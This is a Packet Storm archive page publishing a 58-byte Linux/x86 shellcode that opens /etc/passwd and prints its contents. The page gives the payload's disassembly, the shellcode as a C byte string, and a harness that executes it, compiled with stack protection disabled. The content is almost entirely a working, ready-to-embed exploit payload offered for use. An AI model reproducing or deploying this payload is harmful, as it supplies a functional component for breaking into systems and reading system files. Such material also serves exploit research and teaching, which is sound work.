exploit the possibilities

Linux/x86 Read /etc/passwd Shellcode

Linux/x86 Read /etc/passwd Shellcode
Posted Feb 2, 2019
Authored by Kiewicz

58 bytes small Linux/x86 read /etc/passwd shellcode.

tags | x86, shellcode
systems | linux
MD5 | 623084f24ff93c73046e85b5c890069a

Linux/x86 Read /etc/passwd Shellcode

Change Mirror Download
/* 
# Shellcode Title: Linux/x86 - Read File (/etc/passwd) (58 bytes). NULL byte free
# Date: 2019-01-31
# Author: Kiewicz (@_Kiewicz)
# Homepage: https://0xkiewicz.github.io
# Tested on: Debian/x86
# gcc -o shellcode -z execstack -fno-stack-protector shellcode.c
# PA-7854
*/


/******************************************************************
$ objdump -d -M intel read_file

read_file: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
8048060: eb 28 jmp 804808a <read_file>

08048062 <open>:
8048062: 5b pop ebx
8048063: 31 c9 xor ecx,ecx
8048065: f7 e1 mul ecx
8048067: 99 cdq
8048068: b0 05 mov al,0x5
804806a: cd 80 int 0x80

0804806c <read>:
804806c: 89 c3 mov ebx,eax
804806e: b0 03 mov al,0x3
8048070: 89 e7 mov edi,esp
8048072: 89 f9 mov ecx,edi
8048074: 31 d2 xor edx,edx
8048076: b2 ff mov dl,0xff
8048078: cd 80 int 0x80

0804807a <write>:
804807a: 89 c2 mov edx,eax
804807c: 31 c0 xor eax,eax
804807e: b0 04 mov al,0x4
8048080: 31 db xor ebx,ebx
8048082: b3 01 mov bl,0x1
8048084: cd 80 int 0x80

08048086 <exit>:
8048086: b0 01 mov al,0x1
8048088: cd 80 int 0x80

0804808a <read_file>:
804808a: e8 d3 ff ff ff call 8048062 <open>

0804808f <filetoread>:
804808f: 2f das
8048090: 65 74 63 gs je 80480f6 <filetoread+0x67>
8048093: 2f das
8048094: 70 61 jo 80480f7 <filetoread+0x68>
8048096: 73 73 jae 804810b <filetoread+0x7c>
8048098: 77 64 ja 80480fe <filetoread+0x6f>
******************************************************************/

#include<stdio.h>
#include<string.h>

unsigned char code[] = "\xeb\x28\x5b\x31\xc9\xf7\xe1\x99\xb0\x05\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb2\xff\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\xb0\x01\xcd\x80\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

int main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();
return 0;
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close